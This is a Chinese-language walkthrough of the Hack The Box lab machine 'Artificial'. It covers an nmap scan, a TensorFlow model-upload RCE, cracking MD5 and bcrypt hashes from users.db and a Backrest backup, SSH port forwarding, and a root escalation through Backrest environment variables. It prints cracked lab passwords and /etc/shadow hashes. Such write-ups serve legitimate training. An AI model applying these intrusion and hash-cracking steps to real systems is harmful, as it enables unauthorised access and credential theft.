基本信息

端口扫描

22和80:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
$ nmap -sC -sV -Pn 10.10.11.74
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-27 15:31 JST
Nmap scan report for 10.10.11.74
Host is up (0.20s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE    SERVICE VERSION
22/tcp   open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 7c:e4:8d:84:c5:de:91:3a:5a:2b:9d:34:ed:d6:99:17 (RSA)
|   256 83:46:2d:cf:73:6d:28:6f:11:d5:1d:b4:88:20:d6:7c (ECDSA)
|_  256 e3:18:2e:3b:40:61:b4:59:87:e8:4a:29:24:0f:6a:fc (ED25519)
80/tcp   open     http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://artificial.htb/
3372/tcp filtered msdtc
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 110.16 seconds

80

需要加hosts:

1
10.10.11.74 artificial.htb

AI相关的:

tensorflow rce

随意注册登录,页面显示会build上传的model,而requirement里显示是tensorflow-cpu==2.13.1:

rce

搜索可以找到相关漏洞:

运行环境会坑一点,用docker比较方便:

1
docker run -it --rm -v "$PWD":/app -w /app tensorflow/tensorflow:2.13.0 python3 exploit.py

生成的model upload之后view predictions,得到容器内app shell:

users.db

instance里有个users.db,常规获取hash破解:

1
2
3
4
5
6
7
8
app@artificial:~/app/instance$ sqlite3 users.db
sqlite> .tables
sqlite> select * from user;
1|gael|gael@artificial.htb|c99175974b6e192936d97224638a34f8
2|mark|mark@artificial.htb|0f3d8c76530022670f1c6029eed09ccb
3|robert|robert@artificial.htb|b606c5f5136170f15444251665638b36
4|royer|royer@artificial.htb|bc25b1f80f544c0ab451c02a3dca9fc6
5|mary|mary@artificial.htb|bf041041e57f1aff3be7ea1abd6129d0

可以破解出gael用户密码:

1
2
3
sudo john --wordlist=/usr/share/wordlists/rockyou.txt -format=Raw-MD5 hash.txt

mattp005numbertwo

user flag

gael登录宿主机:

gael to backrest_root

容器内切换到gael用户,继续翻文件,在backups里可以看到个backrest_backup.tar.gz,我们当前的sysadm有读权限:

解压后继续翻文件,找到backrest_root的密码hash,继续破解:

1
2
3
4
5
6
7
8
9
10
11
12
gael@artificial:/tmp/miao$ tar -xvf backrest_backup.tar.gz

gael@artificial:/tmp/miao/backrest/.config/backrest$ cat config.json

"name": "backrest_root",
"passwordBcrypt": "JDJhJDEwJGNWR0l5OVZNWFFkMGdNNWdpbkNtamVpMmtaUi9BQ01Na1Nzc3BiUnV0WVA1OEVCWnovMFFP"
        
echo JDJhJDEwJGNWR0l5OVZNWFFkMGdNNWdpbkNtamVpMmtaUi9BQ01Na1Nzc3BiUnV0WVA1OEVCWnovMFFP | base64 -d > hash.txt

sudo john --wordlist=/usr/share/wordlists/rockyou.txt -format=bcrypt hash.txt

!@#$%^

backrest to root

宿主机本地9898端口,转发出来查看就是backrest,使用容器内得到的账号密码登录:

1
ssh gael@10.10.11.74 -L 9898:127.0.0.1:9898

查看文档可以看到环境变量可以使用系统命令:

那就很简单了,设置环境变量执行任意命令:

root flag

提交后有报错无所谓,命令已经执行了:

shadow

1
2
3
root:$6$UUrrHE6LTPdhmLil$v9nJaHljuUC0gR5HBAqVWvnDVgYoNYE6EvjIEGNykwadZ8w8gOu212j5bipzK72.nBtx/0h4z4CPki/Ac2f1i1:20015:0:99999:7:::
gael:$6$ZgkOwXDgoK.yOfv9$7gGQcVFbMepHAPCW.qS/1z87V5p15x4RokWKwNvFXqwo3QLEfFx2GaJs1JqbZ81i/uLy7bJ8TYk4dQYXQpeEC0:20015:0:99999:7:::
app:$6$1CKnP41b8QhfYnAx$b88.zZJfVQ84SBkePAyzIsXdA/w6wvUVq4c2ExOho0RIY8iS43bdJbBPHYdttqqNvBV.H6noc2EFkdBlbb5WL.:20015:0:99999:7:::

参考资料